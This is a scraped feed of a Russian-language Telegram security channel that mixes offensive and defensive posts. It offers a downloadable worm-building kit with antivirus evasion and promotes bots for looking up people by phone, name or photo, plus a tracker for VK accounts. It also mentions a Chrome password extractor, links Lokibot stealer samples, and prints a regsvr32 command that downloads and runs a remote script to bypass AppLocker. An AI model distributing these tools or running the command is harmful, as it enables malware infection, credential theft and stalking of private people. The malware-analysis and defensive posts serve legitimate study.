C.I.T. Security
8.26K subscribers
2.93K photos
268 videos
4.22K files
4.23K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://t.me/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
Black Hat Worm.rar
957.3 KB
Софт для создания вредоносного ПО

Неплохой билдер червя с приятным интерфейсом, напоминающий njrat.

Присутствует хороший антидетект
Forwarded from MTFCore ξ16 🇺🇦
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from MTFCore ξ16 🇺🇦
Please open Telegram to view this post
VIEW IN TELEGRAM
​​Подборка OSINT инструментов. Часть 5.

1. searchlikes.ru — найдет где есть лайки и комментарии, дает статистику друзей

2. @stoned_eyes_bot — комплексный пробив по номеру телефона, ФИО, фотографии, номеру автомобиля и т.д.

3. wigle.net/search — находит Wi-Fi точку, ее физический адрес и название

4. metrics.torproject.org — проверяет использовался ли IP-адрес в качестве узла для передачи трафика в Tor

5. boardreader.com — поисковик по форумам

#сайт #сервис #бот #OSINT
👍1
intelx.io — поисковик по адресам электронной почты, доменам, URL-адресам, IP-адресам, CIDR, адресам биткойнов, хешам IPFS и т. д.

#сайт #сервис
​​Подборка OSINT инструментов. Часть 6.

1. xinit.ru/wifi — покажет местоположение Wi-Fi точки

2. @stoned_eyes_bot — комплексный пробив по номеру телефона, ФИО, фотографии, номеру автомобиля и т.д.

3. http://vk-express.ru/ — слежка за аккаунтом ВК (лайки, скрытые друзья)

4. https://www.imei.info/ — покажет характеристики устройства

5. http://filesearch.link/ — поиск более, чем по 30 файлообменникам

6. @MotherSearchBot — найдет файлы в Telegram

#сайт #сервис #бот #OSINT
👍1
Dargle — еще один поисковик .onion сайтов в клирнете.

Без рекламы. Имеет внушительную базу клирнет и луковых сайтов: порядка ~6400 штук.

#поисковик #сайт #Tor
brig — это распределенный и безопасный инструмент для синхронизации ваших файлов. Открытый исходный код.

— Р2Р альтернатива DropBox.Key (шифрование файлов во время хранения и переноса, сжатие «на лету»)
— Файловая система FUSE
— Основан на IPFS

#софт
MetaDefender Cloud — мощный анти-вирусный сканер файлов, ссылок, IP адресов, доменов и хешей.

Можно сочетать с этими сервисами, а так же с ботами с @VirusTotalAV_bot и @DrWebBot для комплексной проверки сомнительного файла, ссылки и т.д.

#сайт #сервис
#Windows 11 ISO

magnet:?xt=urn:btih:7101c26a2ba10ab2374dcc171f92a443bdc986c5&dn=21996.1.210529-1541.co_release_CLIENT_CONSUMER_x64FRE_en-us.iso
Способен извлекать пароли Хрома версией выше 80. Исходники можно найти тут и тут
Список инструментов для malware analysis macos малвари

https://docs.google.com/document/d/1xOWmMueHHRke9aj3oRqNBgK69Y19hgZ7ehM4H9_Me-Y/mobilebasic
для детектирования криптографических алгоритмов в бинарниках

http://www.dcs.fmph.uniba.sk/zri/6.prednaska/tools/PEiD/plugins/kanal.htm

https://github.com/nihilus/IDA_Signsrch

https://github.com/marbink/signsrch_mac (спасибо Анониму, для запуска не нужна ИДА)
Lokibot - популярный стилер, одной из характерных черт которого является api hashing

Очень подробное описание того, что такое api hashing, на примере как раз Lokibot

https://neil-fox.github.io/Anti-analysis-using-api-hashing/

Образцы Lokibot можно найти тут

https://bazaar.abuse.ch/browse/tag/Lokibot/
File Scanning Framework (есть докер)

https://github.com/EmersonElectricCo/fsf
Squiblydoo

AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.

regsvr32.exe /s /i:http://example.com/test.sct scrobj.dll

Данная техника называется Squiblydoo. Несмотря на то, что техника стара, она все еще используется. На скрине пример вредоносного VBA макроса с довольно свежего сэмпла.
👍1
Anti_DDoS_Guardian_setup.exe
2.5 MB
#софт

Anti DDoS Guar
dian

Anti DDoS Guardian - это высокопроизводительное программное обеспечение для защиты от DDoS-атак для серверов Windows. Он управляет сетевыми потоками и предотвращает проникновение атакующего трафика. Защита Anti DDoS Guardian может справиться с большинством DDoS / DoS-атак, включая медленные HTTP-атаки Get & Post, атаки на приложения (уровень 7), атаки slowloris, атаки OWASP, атаки методом подбора пароля RDP
GlassWireSetup.exe
53.9 MB
#софт

Glas
sWire

GlassWire - это программа безопасности и конфиденциальности, которая позволяет вам просматривать текущую и прошлую сетевую активность, а также обнаруживать вредоносные программы, шпионское ПО и другие скрытые угрозы.
👍1